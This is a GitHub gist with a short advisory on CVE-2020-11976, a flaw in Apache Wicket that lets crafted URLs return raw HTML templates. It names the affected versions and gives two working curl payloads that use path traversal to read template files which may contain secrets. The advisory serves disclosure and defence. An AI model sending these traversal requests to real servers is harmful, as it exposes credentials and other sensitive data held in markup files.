Last active
June 2, 2021 16:52
-
-
Save mariuszpoplawski/abfc6da5ee84c8a722d06ba18c52e20c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE-2020-11976 - Apache wicket LFI / markup source file read vulnerability | |
| ------------------------------------------ | |
| By crafting a special URL it is possible to make Wicket deliver unprocessed HTML templates. | |
| This would allow an attacker to see possibly sensitive information inside a HTML template that is usually removed during rendering. | |
| Affected are Apache Wicket versions 7.16.0, 8.8.0 and 9.0.0-M5 | |
| For example if there are credentials in the markup which are never supposed to be visible to the client: | |
| <wicket:remove> | |
| some secret | |
| </wicket:remove> | |
| Payload: | |
| $ curl --path-as-is | |
| http://127.0.0.1:8088/prototype/wicket/resource/org.apache.wicket.examples.WicketExamplePage/./WicketExamplePage.html | |
| $ curl --insecure --path-as-is https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/../../../SecretMarkupFile.html | |
| MISC:https://lists.apache.org/thread.html/r104eeefeb1e9da51f7ef79cef0f9ff12e21ef8559b77801e86b21e16%40%3Cusers.wicket.apache.org%3E | |
| URL:https://lists.apache.org/thread.html/r104eeefeb1e9da51f7ef79cef0f9ff12e21ef8559b77801e86b21e16%40%3Cusers.wicket.apache.org%3E | |
| Mariusz Popłwski / AFINE.com team |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment